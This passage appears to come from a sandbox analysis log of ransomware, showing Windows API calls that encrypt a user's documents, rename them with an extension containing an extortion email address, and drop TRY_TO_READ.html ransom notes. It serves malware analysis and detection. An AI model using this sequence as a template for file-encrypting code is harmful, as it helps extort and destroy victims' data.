oFflFazt6Gemgg-0Z.csv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sk4x4k0\\c offlfazt6gemgg-0z.csv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x544 [0167.383] GetProcessHeap () returned 0x2e0000 [0167.383] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31f5f0 | out: hHeap=0x2e0000) returned 1 [0167.383] GetFileSizeEx (in: hFile=0x544, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=67713) returned 1 [0167.383] SetFilePointer (in: hFile=0x544, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x10881 [0167.383] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.383] GetProcessHeap () returned 0x2e0000 [0167.383] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.383] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.383] WriteFile (in: hFile=0x544, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.384] WriteFile (in: hFile=0x544, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.384] WriteFile (in: hFile=0x544, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.384] ReadFile (in: hFile=0x544, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x10881, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x10881, lpOverlapped=0x0) returned 1 [0167.385] SetFilePointer (in: hFile=0x544, lDistanceToMove=-67713, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.385] WriteFile (in: hFile=0x544, lpBuffer=0x3c2ca0*, nNumberOfBytesToWrite=0x10881, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3c2ca0*, lpNumberOfBytesWritten=0x2acf9c8*=0x10881, lpOverlapped=0x0) returned 1 [0167.385] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.385] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.385] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\9pgKaWrY8W7ZG1jTV.odt", dwFileAttributes=0x80) returned 1 [0167.386] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\9pgKaWrY8W7ZG1jTV.odt") returned 70 [0167.386] GetProcessHeap () returned 0x2e0000 [0167.386] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf2) returned 0x336dd8 [0167.386] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\9pgKaWrY8W7ZG1jTV.odt" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\9pgKaWrY8W7ZG1jTV.odt") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\9pgKaWrY8W7ZG1jTV.odt" [0167.386] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\9pgKaWrY8W7ZG1jTV.odt", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\9pgKaWrY8W7ZG1jTV.odt.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\9pgKaWrY8W7ZG1jTV.odt.12781717671972518758.ex_parvis@aol.com.AIR" [0167.386] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\9pgKaWrY8W7ZG1jTV.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sk4x4k0\\9pgkawry8w7zg1jtv.odt"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\9pgKaWrY8W7ZG1jTV.odt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sk4x4k0\\9pgkawry8w7zg1jtv.odt.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.388] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\9pgKaWrY8W7ZG1jTV.odt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sk4x4k0\\9pgkawry8w7zg1jtv.odt.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x544 [0167.388] GetProcessHeap () returned 0x2e0000 [0167.388] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0167.388] GetFileSizeEx (in: hFile=0x544, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=65566) returned 1 [0167.388] SetFilePointer (in: hFile=0x544, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1001e [0167.388] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.389] GetProcessHeap () returned 0x2e0000 [0167.389] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.389] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.389] WriteFile (in: hFile=0x544, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.389] WriteFile (in: hFile=0x544, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.390] WriteFile (in: hFile=0x544, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.390] ReadFile (in: hFile=0x544, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x1001e, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x1001e, lpOverlapped=0x0) returned 1 [0167.390] SetFilePointer (in: hFile=0x544, lDistanceToMove=-65566, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.390] WriteFile (in: hFile=0x544, lpBuffer=0x3c2438*, nNumberOfBytesToWrite=0x1001e, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3c2438*, lpNumberOfBytesWritten=0x2acf9c8*=0x1001e, lpOverlapped=0x0) returned 1 [0167.391] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.391] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.391] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\5tms4nZIySR.odt", dwFileAttributes=0x80) returned 1 [0167.391] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\5tms4nZIySR.odt") returned 64 [0167.391] GetProcessHeap () returned 0x2e0000 [0167.391] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe6) returned 0x3ac428 [0167.391] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\5tms4nZIySR.odt" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\5tms4nZIySR.odt") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\5tms4nZIySR.odt" [0167.391] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\5tms4nZIySR.odt", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\5tms4nZIySR.odt.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\5tms4nZIySR.odt.12781717671972518758.ex_parvis@aol.com.AIR" [0167.391] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\5tms4nZIySR.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sk4x4k0\\5tms4nziysr.odt"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\5tms4nZIySR.odt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sk4x4k0\\5tms4nziysr.odt.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.394] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\5tms4nZIySR.odt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sk4x4k0\\5tms4nziysr.odt.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x544 [0167.394] GetProcessHeap () returned 0x2e0000 [0167.394] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0167.394] GetFileSizeEx (in: hFile=0x544, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=82063) returned 1 [0167.394] SetFilePointer (in: hFile=0x544, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1408f [0167.394] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.394] GetProcessHeap () returned 0x2e0000 [0167.394] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.394] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.394] WriteFile (in: hFile=0x544, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.395] WriteFile (in: hFile=0x544, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.395] WriteFile (in: hFile=0x544, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.395] ReadFile (in: hFile=0x544, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x1408f, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x1408f, lpOverlapped=0x0) returned 1 [0167.396] SetFilePointer (in: hFile=0x544, lDistanceToMove=-82063, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.396] WriteFile (in: hFile=0x544, lpBuffer=0x3c64a8*, nNumberOfBytesToWrite=0x1408f, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3c64a8*, lpNumberOfBytesWritten=0x2acf9c8*=0x1408f, lpOverlapped=0x0) returned 1 [0167.397] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c9ad790, ftCreationTime.dwHighDateTime=0x1d4cbf0, ftLastAccessTime.dwLowDateTime=0xb14c2bb0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb14c2bb0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b18a8 [0167.397] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x548 [0167.399] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ea49e\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x548 [0167.400] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.400] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.400] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\ZxdKJoauhycixc.xls", dwFileAttributes=0x80) returned 1 [0167.400] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\ZxdKJoauhycixc.xls") returned 70 [0167.400] GetProcessHeap () returned 0x2e0000 [0167.400] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf2) returned 0x31fae0 [0167.400] lstrcpyW (in: lpString1=0x31fae0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\ZxdKJoauhycixc.xls" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\ZxdKJoauhycixc.xls") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\ZxdKJoauhycixc.xls" [0167.400] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\ZxdKJoauhycixc.xls", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\ZxdKJoauhycixc.xls.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\ZxdKJoauhycixc.xls.12781717671972518758.ex_parvis@aol.com.AIR" [0167.400] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\ZxdKJoauhycixc.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\zxdkjoauhycixc.xls"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\ZxdKJoauhycixc.xls.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\zxdkjoauhycixc.xls.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.404] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\ZxdKJoauhycixc.xls.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\zxdkjoauhycixc.xls.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x548 [0167.404] GetProcessHeap () returned 0x2e0000 [0167.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31fae0 | out: hHeap=0x2e0000) returned 1 [0167.404] GetFileSizeEx (in: hFile=0x548, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=29190) returned 1 [0167.404] SetFilePointer (in: hFile=0x548, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x7206 [0167.404] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.404] GetProcessHeap () returned 0x2e0000 [0167.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.404] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.404] WriteFile (in: hFile=0x548, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.405] WriteFile (in: hFile=0x548, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.405] WriteFile (in: hFile=0x548, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.405] ReadFile (in: hFile=0x548, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x7206, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x7206, lpOverlapped=0x0) returned 1 [0167.406] SetFilePointer (in: hFile=0x548, lDistanceToMove=-29190, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.406] WriteFile (in: hFile=0x548, lpBuffer=0x3b9620*, nNumberOfBytesToWrite=0x7206, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b9620*, lpNumberOfBytesWritten=0x2acf9c8*=0x7206, lpOverlapped=0x0) returned 1 [0167.407] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.407] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.407] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\uIpA.pdf", dwFileAttributes=0x80) returned 1 [0167.407] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\uIpA.pdf") returned 60 [0167.407] GetProcessHeap () returned 0x2e0000 [0167.407] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xde) returned 0x3a7428 [0167.407] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\uIpA.pdf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\uIpA.pdf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\uIpA.pdf" [0167.407] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\uIpA.pdf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\uIpA.pdf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\uIpA.pdf.12781717671972518758.ex_parvis@aol.com.AIR" [0167.407] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\uIpA.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\uipa.pdf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\uIpA.pdf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\uipa.pdf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.409] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\uIpA.pdf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\uipa.pdf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x548 [0167.409] GetProcessHeap () returned 0x2e0000 [0167.409] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0167.409] GetFileSizeEx (in: hFile=0x548, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=8549) returned 1 [0167.410] SetFilePointer (in: hFile=0x548, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x2165 [0167.410] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.410] GetProcessHeap () returned 0x2e0000 [0167.410] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.410] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.410] WriteFile (in: hFile=0x548, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.411] WriteFile (in: hFile=0x548, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.411] WriteFile (in: hFile=0x548, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.411] ReadFile (in: hFile=0x548, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x2165, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x2165, lpOverlapped=0x0) returned 1 [0167.411] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.411] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.411] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\SZ6F1bo5Fkg0YVFI5Q7.rtf", dwFileAttributes=0x80) returned 1 [0167.412] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\SZ6F1bo5Fkg0YVFI5Q7.rtf") returned 75 [0167.412] GetProcessHeap () returned 0x2e0000 [0167.412] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfc) returned 0x363b58 [0167.412] lstrcpyW (in: lpString1=0x363b58, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\SZ6F1bo5Fkg0YVFI5Q7.rtf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\SZ6F1bo5Fkg0YVFI5Q7.rtf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\SZ6F1bo5Fkg0YVFI5Q7.rtf" [0167.412] lstrcatW (in: 